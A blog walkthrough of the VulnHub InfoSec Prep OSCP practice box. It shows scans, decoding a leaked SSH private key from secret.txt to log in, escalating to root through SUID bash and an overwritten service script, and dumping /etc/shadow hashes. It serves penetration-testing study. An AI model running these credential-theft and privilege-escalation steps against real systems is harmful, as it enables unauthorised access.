Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

VulnHub InfoSec Prep OSCP - WordPress home page

VulnHub InfoSec Prep OSCP Walkthrough – Stealing SSH Keys

I know that these posts are slightly repetitive, but I also solved VulnHub InfoSec Prep OSCP during my streaming!

VulnHub InfoSec Prep OSCP Walkthrough – Introduction

Just like my VulnHub Relevant walkthrough, this VulnHub box starts off attacking WordPress.

This time, it’s InfoSec Prep OSCP by FalconSpy, which you can download here.

YouTube Version of this Post

If you prefer video and audio over just reading the text, then you can find the YouTube version of this post below.

That said, don’t forget to hit those like and subscribe buttons to help support the blog and channel!

Get Your NordVPN Offer Now!

Enumeration

First, I ran netdiscover to get the IP of my target.

root@kali:~# netdiscover -i eth0 -r 192.168.5.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
8 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 480               
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.5.221   08:00:27:20:f3:7c      1      60  PCS Systemtechnik GmbH      

Next, I ran Nmap and saw that only ports 22 and 80 were listening on the host.

root@kali:~/VulnHub/oscpPrep# nmap -A 192.168.5.221
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-27 19:17 EDT
Nmap scan report for 192.168.5.221
Host is up (0.00086s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/secret.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
MAC Address: 08:00:27:20:F3:7C (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/27%OT=22%CT=1%CU=34338%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F483F31%P=i686-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.86 ms 192.168.5.221

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.43 seconds

As I mentioned in the introduction, the target was yet another WordPress instance.

VulnHub InfoSec Prep OSCP - WordPress home page

More application info

Using standard WordPress user enumeration, I found that ‘admin’ was the only valid username.

Admin author

This WordPress instance was also vulnerable to username enumeration on the login page, as you can see from the following error.

VulnHub InfoSec Prep OSCP - WordPress user enumeration

Next, I ran CMSmap to see if there were any vulnerable plugins on the target.

root@kali:~/tools/CMSmap# python3 cmsmap.py http://192.168.5.221/
[-] Date & Time: 27/08/2020 19:22:32
[-] ExploitDB and CMSmap plugins are not updated to the latest version
[-] Would you like to update it?
[y/N]: n
[I] Threads: 5
[-] Target: http://192.168.5.221 (192.168.5.221)
[M] Website Not in HTTPS: http://192.168.5.221
[I] Server: Apache/2.4.41 (Ubuntu)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://192.168.5.221/robots.txt
[I] CMS Detection: WordPress
[I] WordPress Version: 5.4.2
[I] WordPress Theme: twentytwenty
[-] WordPress usernames identified:
[M] admin
[M] XML-RPC services are enabled
[I] Autocomplete Off Not Found: http://192.168.5.221/wp-login.php
[-] Default WordPress Files:

...

[I] akismet v4.1.5
[M]  EDB-ID: 37826 "WordPress Core 3.4.2 - Multiple Path Disclosure Vulnerabilities"
[M]  EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
[I] worprees plugin bug dar
grep: plugin: No such file or directory
grep: bug: No such file or directory
grep: dar[&=/]: No such file or directory
[M]  EDB-ID: 48065 "WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"
[I] Checking for Directory Listing Enabled ...

...

[-] Date & Time: 27/08/2020 19:24:55
[-] Completed in: 0:02:22

When I looked at robots.txt, I discovered a reference to a secret.txt file, which seemed promising.

Robots.txt

Initial Foothold

First, I visited the secret.txt file, which seemed to be base64 encoded.

Secret.txt

When I decoded the text, it was an OpenSSH private key.

VulnHub InfoSec Prep OSCP - Decoded secret.txt

I downloaded the secret, decoded it, and saved it to an SSH private key file.

root@kali:~/VulnHub/oscpPrep# wget 192.168.5.221/secret.txt
--2020-08-27 19:33:52--  http://192.168.5.221/secret.txt
Connecting to 192.168.5.221:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3502 (3.4K) [text/plain]
Saving to: 'secret.txt'

secret.txt          100%[===================>]   3.42K  --.-KB/s    in 0s      

2020-08-27 19:33:52 (267 MB/s) - 'secret.txt' saved [3502/3502]

root@kali:~/VulnHub/oscpPrep# cat secret.txt | tr -d '\n' > newsecret.txt
root@kali:~/VulnHub/oscpPrep# cat newsecret.txt | base64 -d > newssh-key
root@kali:~/VulnHub/oscpPrep# chmod 600 newssh-key

When I looked at the home page again, it referenced an ‘oscp’ user, so I was hoping that this was who the key was for.

OSCP user reference

Using the ‘oscp’ username and my ‘secret’ key, I connected successfully to the box!

root@kali:~/VulnHub/oscpPrep# ssh -i newssh-key [email protected]
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

...

Last login: Sat Jul 11 16:50:11 2020 from 192.168.128.1
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Get Your NordVPN Offer Now!

Privilege Escalation

First, I searched the box for any SUID binaries, as this is a common method of privilege escalation.

-bash-5.0$ find / -perm -u=s -type f 2>/dev/null
/snap/snapd/8790/usr/lib/snapd/snap-confine
/snap/snapd/8140/usr/lib/snapd/snap-confine
/snap/core18/1885/bin/mount
/snap/core18/1885/bin/ping
/snap/core18/1885/bin/su
/snap/core18/1885/bin/umount
/snap/core18/1885/usr/bin/chfn
/snap/core18/1885/usr/bin/chsh
/snap/core18/1885/usr/bin/gpasswd
/snap/core18/1885/usr/bin/newgrp
/snap/core18/1885/usr/bin/passwd
/snap/core18/1885/usr/bin/sudo
/snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1885/usr/lib/openssh/ssh-keysign
/snap/core18/1754/bin/mount
/snap/core18/1754/bin/ping
/snap/core18/1754/bin/su
/snap/core18/1754/bin/umount
/snap/core18/1754/usr/bin/chfn
/snap/core18/1754/usr/bin/chsh
/snap/core18/1754/usr/bin/gpasswd
/snap/core18/1754/usr/bin/newgrp
/snap/core18/1754/usr/bin/passwd
/snap/core18/1754/usr/bin/sudo
/snap/core18/1754/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1754/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

As you can see, /usr/bin/bash was actually SUID root, and I was able to IMMEDIATELY escalate my privileges! I’m not sure if this was the intended solution, but I’ll gladly take it.

-bash-5.0$ /usr/bin/bash -p
bash-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)

Before searching the box for additional escalation methods, I grabbed the contents of the flag file.

bash-5.0# cat flag.txt
d73b04b0e696b0945283defa3eee4538

I also grabbed the shadow file, for potential future cracking.

bash-5.0# cat /etc/shadow
root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
sshd:*:18452:0:99999:7:::
systemd-coredump:!!:18452::::::
oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::
lxd:!:18452::::::
mysql:!:18452:0:99999:7:::

There was also a file called ‘ip’ owned by root in the oscp user’s home directory.

-bash-5.0$ cat ip
#!/bin/sh
cp /etc/issue-standard /etc/issue
/usr/local/bin/get-ip-address >> /etc/issue

The ‘ip-update’ service called this binary, which seemed interesting.

-bash-5.0$ grep -r "/home/oscp/ip" /etc
grep: /etc/sudoers: Permission denied
grep: /etc/ufw/before.init: Permission denied
grep: /etc/ufw/before6.rules: Permission denied
grep: /etc/ufw/before.rules: Permission denied
grep: /etc/ufw/after.init: Permission denied
grep: /etc/ufw/after6.rules: Permission denied
grep: /etc/ufw/user.rules: Permission denied
grep: /etc/ufw/after.rules: Permission denied
grep: /etc/ufw/user6.rules: Permission denied
grep: /etc/security/opasswd: Permission denied
grep: /etc/gshadow-: Permission denied
grep: /etc/shadow-: Permission denied
grep: /etc/polkit-1/localauthority: Permission denied
grep: /etc/ssl/private: Permission denied
/etc/systemd/system/ip-update.service:ExecStart=/home/oscp/ip
-bash-5.0$ cat /etc/systemd/system/ip-update.service
[Unit]
Description=Write current ip addr to /etc/issue

[Service]
Type=oneshot
RemainAfterExit=true
ExecStart=/home/oscp/ip

[Install]
WantedBy=multi-user.target

As I owned my home directory, I could overwrite the existing ‘ip’ file and use the service as another avenue of privilege escalation.

-bash-5.0$ cat ip
#!/bin/bash

cp /usr/bin/bash /tmp/r00t
chown root:root /tmp/r00t
chmod 4755 /tmp/r00t
-bash-5.0$ chmod +x ip
-bash-5.0$ ls -al /tmp
total 52
drwxrwxrwt 13 root root 4096 Aug 27 23:51 .
drwxr-xr-x 20 root root 4096 Jul  9 03:25 ..
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .font-unix
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .ICE-unix
drwx------  3 root root 4096 Aug 27 19:02 snap.lxd
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-apache2.service-lzxICh
drwx------  3 root root 4096 Aug 27 23:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-fwupd.service-Kb1GYe
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-logind.service-5WZZXe
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-resolved.service-n5EyAi
drwx------  3 root root 4096 Aug 27 19:02 systemd-private-4c7993c1f7364e1c9b8b0525cab0ea5e-systemd-timesyncd.service-5RYQag
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .Test-unix
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .X11-unix
drwxrwxrwt  2 root root 4096 Aug 27 19:02 .XIM-unix

...

-bash-5.0$ ls -al /tmp
total 1204
drwxrwxrwt 12 root root    4096 Aug 28 00:03 .
drwxr-xr-x 20 root root    4096 Jul  9 03:25 ..
drwxrwxrwt  2 root root    4096 Aug 28 00:03 .font-unix
drwxrwxrwt  2 root root    4096 Aug 28 00:03 .ICE-unix
-rwsr-xr-x  1 root root 1183448 Aug 28 00:03 r00t

When I executed my new /tmp/r00t binary, I also gained the expected root permissions!

-bash-5.0$ /tmp/r00t -p
r00t-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Get Your NordVPN Offer Now!

VulnHub InfoSec Prep OSCP Walkthrough – Conclusion

I’m still not sure if /usr/bin/bash was the expected method of privilege escalation, but the ‘ip’ script was a good edition.

This was a VERY simple box, although I’m not sure how good of a VulnHub OSCP prep box it is.

In the meantime, let me know if there is any other content that you’d like to see, or just come on over and like/subscribe to the YouTube channel!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.